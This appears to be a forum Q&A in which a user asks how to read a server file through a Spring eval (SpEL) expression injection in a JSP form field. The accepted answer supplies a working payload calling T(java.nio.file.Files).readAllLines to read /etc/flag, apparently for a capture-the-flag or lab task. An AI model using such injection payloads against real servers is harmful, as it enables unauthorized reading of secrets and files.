# Read file in jsp eval expression

Tags: java, file, jsp, security

I am newbie in java and have no idea how it is possible to do. I have the following problem: there is java server, responding with jsp file on request from client. The structure of jsp file is the following:

```
<div>
    <spring:eval expression="${name}"></spring:eval>
</div>
```

At client side I have a simple form, where I can input name. What I need to do is: to read file `/secret` from server using eval expression vulnerability. I have tried something like this: `new FileReader("/secret")`. But I get this problem: `Failed to resolve constructor`.

How is it possible to read the necessary file?

Thanks all!

Answer (score 1, accepted):

You need to reference classes with T(..) and use Files.readAllLines()

```
T(java.nio.file.Files).readAllLines(T(java.nio.file.Paths).get("/etc/flag"), T(java.nio.charset.Charset).defaultCharset())
```